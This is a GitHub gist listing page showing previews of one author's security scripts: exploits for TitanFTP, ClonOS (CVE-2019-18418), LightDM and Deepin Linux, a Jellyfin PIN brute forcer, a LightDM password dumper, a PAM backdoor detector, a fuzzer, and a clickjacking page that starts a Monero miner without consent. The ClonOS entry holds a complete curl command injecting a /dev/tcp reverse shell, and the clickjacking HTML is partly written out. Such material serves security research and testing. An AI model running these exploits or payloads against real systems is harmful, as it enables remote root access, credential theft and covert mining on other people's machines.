bcoles
/ linux-pam-backdoor-detect.sh
Created
September 13, 2020 13:40
Detect PAM backdoors created by linux-pam-backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Detect PAM backdoors created by linux-pam-backdoor: | |
| # https://github.com/zephrax/linux-pam-backdoor | |
| # | |
| # Note: this will likely only work with PAM version 1.3.0. | |
| # --- | |
| # $ ./backdoor.sh -v 1.3.0 -p some_s3cr3t_p455word | |
| # Automatic PAM Backdoor | |
| # PAM Version: 1.3.0 | |
| # Password: some_s3cr3t_p455word |
bcoles
/ titanftp-server-admin-event-handler-rce
Last active
March 22, 2020 04:19
titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE | |
| # | |
| # Requires remote administration interface to be enabled. (Default port 31001/tcp). | |
| # Creates a new server and adds an event handler to execute a PowerShell reverse shell. | |
| # --- | |
| # $ ./titanftp-server-admin-event-handler-rce | |
| # TitanFTP Server Administrator Event Handler Authenticated RCE | |
| # | |
| # Generating PowerShell reverse shell to 172.16.191.165:1337 ... |
bcoles
/ clonos-root-rce.sh
Last active
November 4, 2019 13:30
Trivial ClonOs remote root RCE exploit for CVE-2019-18418
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # clonos-root-rce | |
| # Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker | |
| # Note: Start netcat listener on LHOST:LPORT first | |
| RHOST="172.16.191.240" | |
| LHOST="172.16.191.165" | |
| LPORT=1337 | |
| curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| ################################################################################ | |
| # Jellyfin Password Reset PIN Brute Force # | |
| # # | |
| # Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. # | |
| # This will likely also work on Emby Media Server, but untested. # | |
| # # | |
| # Note: cURL must be installed and in $PATH # | |
| # # | |
| # Note: Upon successful expoitation, the password will be reset for all users, # |
bcoles
/ lightdmpwn.sh
Created
September 19, 2018 08:36
Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358) | |
| # --- | |
| # Usage: ./lightpwn | |
| # A LightDM session is required. Exploitation will lock the current session, | |
| # and could take several minutes. It usually takes about a minute. | |
| # When the screen stops flashing, unlock the session and run: /bin/subash | |
| # --- | |
| # There's nothing new or special about this exploit. | |
| # It's simply a slightly more weaponised version of the original PoC, |
bcoles
/ lastore-daemon-root.sh
Created
March 24, 2018 22:39
Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit | |
| # | |
| # The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user | |
| # in the sudo group to install arbitrary packages without providing a password, | |
| # resulting in code execution as root. By default, the first user created on | |
| # the system is a member of the sudo group. | |
| # ~ bcoles | |
| # | |
| # Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/ |
bcoles
/ lightdmdump
Created
March 11, 2018 05:57
Dump clear text passwords from lightdm sessions on Ubuntu
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # lightdmdump | |
| # --- | |
| # Dump clear text passwords from lightdm sessions on Ubuntu | |
| # Requires root privileges to dump lightdm process memory | |
| # Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS | |
| # --- | |
| # Bug discovered by: Sven Blumenstein | |
| # Disclosure date: 2017-09-15 | |
| # Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # List sub-domains using crt.sh | |
| set -euo pipefail | |
| IFS=$'\n\t' | |
| error() { | |
| echo "[ERROR] $*" | |
| exit 1 | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| ################################################### | |
| # ----------------------------------------------- # | |
| # Fuzz Origami Ruby gem with mutated PDF files # | |
| # ----------------------------------------------- # | |
| # # | |
| # Each test case is written to 'fuzz.pdf' in the # | |
| # current working directory. # | |
| # # | |
| # Crashes and the associated backtrace are saved # |
bcoles
/ clickjack-authedmine.html
Created
October 21, 2017 19:32
Start the AuthedMine JavaScript Monero miner without user consent (using clickjacking)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01"> | |
| <iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe> | |
| </div> | |
| </body> | |
| <script> | |
| window.onmousemove = function(e) { | |
| var container = document.getElementById("container"); |
NewerOlder